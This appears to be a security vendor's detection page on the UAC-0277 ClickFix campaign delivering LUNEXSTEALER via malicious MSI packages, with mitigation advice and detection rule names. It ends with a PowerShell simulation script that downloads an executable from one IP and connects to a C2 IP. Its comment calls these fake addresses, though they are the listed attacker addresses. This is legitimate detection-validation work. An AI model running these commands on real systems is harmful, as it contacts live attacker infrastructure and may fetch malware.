UAC-0277 Attacks Deliver LUNEXSTEALER via Malicious MSI and ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Threat actors tracked as UAC-0277 are compromising legitimate websites to inject malicious JavaScript that lures users into executing commands through a fake Cloudflare verification page. This ClickFix technique ultimately delivers MSI packages containing LUNEXSTEALER or additional loaders that leverage BYOVD to evade security controls. The campaign also uses blockchain-based command-and-control infrastructure on Polygon and Ethereum to dynamically manage attacker resources.
Investigation
CERT-UA identified more than 100 compromised websites and analyzed three MSI variants associated with the campaign. Researchers observed DLL side-loading involving FnHotkeyUtility.exe and exploitation of the vulnerable AMD PDFWKRNL.sys driver to bypass Windows Defender protections. The investigation also uncovered the LUNARAXE browser extension and the NAIVEMESS PowerShell component used to collect and exfiltrate data.
Mitigation
Administrators should restrict access to the Run dialog (Win+R) through Group Policy and limit MSI installation privileges to authorized users. Enabling the Microsoft Vulnerable Driver Blocklist is essential for reducing the risk of BYOVD attacks. Organizations should also enforce browser extension allowlists and monitor suspicious msiexec.exe command-line activity involving remote URLs.
Response
When suspicious MSI execution or unauthorized browser extensions are detected, isolate the affected host and terminate processes associated with LUNEXSTEALER. Review scheduled tasks for entries named psychedelicloveUtils and inspect browser profiles for the Microsoft Office Word Editor extension. Any identified fake Cloudflare verification pages associated with the campaign should be reported to CERT-UA.
Attack Flow
Detections
Suspicious RunMRU Entry With LOLBin Semantics (via registry_event)
Possible Remote MSI File Installation Attempt (via cmdline)
Suspicious Scheduled Task (via audit)
Suspicious File Download Direct IP (via proxy)
Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
IOCs (HashSha256) to detect: UAC-0277 Campaign: Malicious MSI Deployment via ClickFix Technique and LUNEXSTEALER Malware Part 2
IOCs (HashSha256) to detect: UAC-0277 Campaign: Malicious MSI Deployment via ClickFix Technique and LUNEXSTEALER Malware Part 1
IOCs (HashMd5) to detect: UAC-0277 Campaign: Malicious MSI Deployment via ClickFix Technique and LUNEXSTEALER Malware Part 2
IOCs (HashMd5) to detect: UAC-0277 Campaign: Malicious MSI Deployment via ClickFix Technique and LUNEXSTEALER Malware Part 1
IOCs (SourceIP) to detect: UAC-0277 Campaign: Malicious MSI Deployment via ClickFix Technique and LUNEXSTEALER Malware
IOCs (DestinationIP) to detect: UAC-0277 Campaign: Malicious MSI Deployment via ClickFix Technique and LUNEXSTEALER Malware
Detect Interaction with Malicious C2 Servers Using HTTP and WebSocket [Windows Network Connection]
FnHotkeyUtility Executing Malicious spkvol.dll via DLL Side-Loading [Windows Sysmon]
Malicious MSI Package Download using Msiexec and Vulnerability Exploitation [Windows Process Creation]
Detect Malicious JavaScript on Compromised Websites [Webserver]
Simulation Execution
-
Attack Narrative & Commands: The adversary has successfully performed a drive-by compromise. To establish persistence and download the next-stage malware, the implanted agent attempts to fetch a file named
psychedeliclove.exefrom a specific URI. Simultaneously, the agent attempts to beacon out to a secondary C2 node located at193.178.159.128on port8080to receive instructions via a WebSocket-like HTTP connection. These specific indicators are intended to trigger the existing proxy-based detection rules. -
Regression Test Script:
# Simulation Script for Detection Validation # Purpose: Trigger the specific URL and IP/Port indicators in the detection rule. Write-Host "[*] Starting Simulation..." -ForegroundColor Cyan # 1. Trigger Selection 1: Malicious URL Pattern Write-Host "[*] Attempting to access malicious URL pattern..." -ForegroundColor Yellow try { # We use a non-existent local listener or a fake URL to ensure we don't actually hit a real malicious site, # but the proxy should still log the request attempt. Invoke-WebRequest -Uri "http://107.175.82.242:9000/wilow/psychedeliclove.exe" -ErrorAction SilentlyContinue } catch { Write-Host "[!] Request failed (expected), but telemetry should be generated." -ForegroundColor Gray } # 2. Trigger Selection 2: Specific IP and Port Write-Host "[*] Attempting to connect to C2 IP on port 8080..." -ForegroundColor Yellow try { $client = New-Object System.Net.Sockets.TcpClient $client.Connect("193.178.159.128", 8080) $client.Close() } catch { Write-Host "[!] Connection failed (expected), but proxy logs should capture the attempt." -ForegroundColor Gray } Write-Host "[*] Simulation Complete." -ForegroundColor Cyan -
Cleanup Commands:
# No persistent files are created by this simulation. # Only temporary network connections are attempted. Write-Host "[*] Cleanup complete. No artifacts left on system." -ForegroundColor Green